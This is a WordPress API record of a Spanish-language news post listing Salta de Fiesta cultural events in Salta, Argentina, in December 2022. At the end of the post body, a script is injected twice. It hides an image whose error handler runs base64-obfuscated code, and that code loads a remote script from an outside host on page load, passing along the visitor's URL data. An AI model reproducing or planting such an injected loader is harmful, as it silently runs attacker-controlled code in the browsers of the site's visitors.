{"id":1950,"date":"2022-12-15T14:19:16","date_gmt":"2022-12-15T17:19:16","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1950"},"modified":"2025-08-14T00:27:50","modified_gmt":"2025-08-14T03:27:50","slug":"continuan-las-presentaciones-en-el-marco-de-salta-de-fiesta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1950","title":{"rendered":"Contin\u00faan las presentaciones en el marco de Salta de Fiesta"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#242323\"><em>Esta noche se presentar\u00e1 la Orquesta Sinf\u00f3nica de Salta a partir de las 21 h en la Plaza 9 de Julio. La programaci\u00f3n comprender\u00e1 cl\u00e1sicos de pel\u00edculas para todas las edades. Funci\u00f3n con entrada libre y gratuita.<\/em><\/h4>\n\n\n\n<p>El ciclo Salta de Fiesta ya present\u00f3 una primera gala que protagoniz\u00f3 la Orquesta Sinf\u00f3nica Infantil y Juvenil, junto a la Escuela Oficial de Ballet de la Provincia, ambos cuerpos formativos que pertenecen al Instituto de M\u00fasica y Danza (IMD) .<\/p>\n\n\n\n<p>Esta noche ser\u00e1 el turno de la Orquesta Sinf\u00f3nica de Salta. El cuerpo art\u00edstico se presentar\u00e1 en la Plaza 9 de Julio a partir de las 21 h, el repertorio estar\u00e1 conformado por obras musicales representativas de diferentes cl\u00e1sicos del s\u00e9ptimo arte de todos los tiempos.<\/p>\n\n\n\n<p>Cronograma Salta de Fiesta<\/p>\n\n\n\n<p>15 de diciembre<\/p>\n\n\n\n<p>21 h- Plaza 9 de Julio, Espa\u00f1a y Mitre. Hace ocho a\u00f1os que la Orquesta Sinf\u00f3nica de Salta ofreci\u00f3 el \u00faltimo concierto en la plaza principal de nuestra Ciudad, en este regreso a la Plaza 9 de Julio, presentar\u00e1 para p\u00fablicos de distintas edades, \u201cAventura Sinf\u00f3nica: M\u00fasica de pel\u00edculas\u201d.<\/p>\n\n\n\n<p>En caso de tormenta, la presentaci\u00f3n se trasladar\u00e1 al Teatro Provincial \u201cJuan Carlos Saravia\u201d<\/p>\n\n\n\n<p>16 de diciembre<\/p>\n\n\n\n<p>21 h- Teatro Provincial de Salta. Presentaci\u00f3n del Ballet de la Provincia de Salta: Cuentos Danzados.<\/p>\n\n\n\n<p>Presentaciones en parques de la Provincia:<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A partir de las 20:30, en el Parque Sur, el Ballet Folkl\u00f3rico de la Provincia de Salta Gral. M. M. de G\u00fcemes presentar\u00e1 \u201cPor Siempre Argentinas\u201d, en Homenaje a H\u00e9roes y Ca\u00eddos de Malvinas.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A partir de las 18, en el Parque de la Familia se realizar\u00e1 la presentaci\u00f3n del Ensamble de Percusi\u00f3n perteneciente a la Orquesta Sinf\u00f3nica Infantil y Juvenil de la Provincia.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A partir de las 18, en el Parque del Bicentenario se realizar\u00e1 la presentaci\u00f3n del Ensamble de Tango perteneciente a la Orquesta Sinf\u00f3nica Infantil y Juvenil de la Provincia.<\/p>\n\n\n\n<p>17 de diciembre<\/p>\n\n\n\n<p>A partir de las 18, se realizar\u00e1 la Noche de los Museos.<\/p>\n\n\n\n<p>En todos los museos provinciales, con entrada libre y gratuita. Museos privados y municipales adheridos. En esta edici\u00f3n, participan museos de Salta Capital, Rosario de la Frontera, Cafayate, Cachi, Santa Rosa de Tastil, Tartagal, San Antonio de los Cobres, Vaqueros, Campo Santo, Coronel Moldes y Met\u00e1n.<\/p>\n\n\n\n<p>22 de diciembre<\/p>\n\n\n\n<p>A las 21, en la Iglesia Catedral de Salta, la Orquesta Sinf\u00f3nica de Salta llevar\u00e1 adelante el tradicional \u201cConcierto de Navidad\u201d, bajo la direcci\u00f3n del maestro Jorge Lhez.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/continuan-las-presentaciones-en-el-marco-de-salta-de-fiesta-86825\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Esta noche se presentar\u00e1 la Orquesta Sinf\u00f3nica de Salta a partir de las 21 h en la Plaza 9 de Julio. La programaci\u00f3n comprender\u00e1 cl\u00e1sicos de pel\u00edculas para todas las edades. Funci\u00f3n con entrada libre y gratuita. El ciclo Salta de Fiesta ya present\u00f3 una primera gala que protagoniz\u00f3 la Orquesta Sinf\u00f3nica Infantil y Juvenil, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1951,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-1950","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1950"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1950"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1950\/revisions"}],"predecessor-version":[{"id":7241,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1950\/revisions\/7241"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1951"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1950"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1950"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1950"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}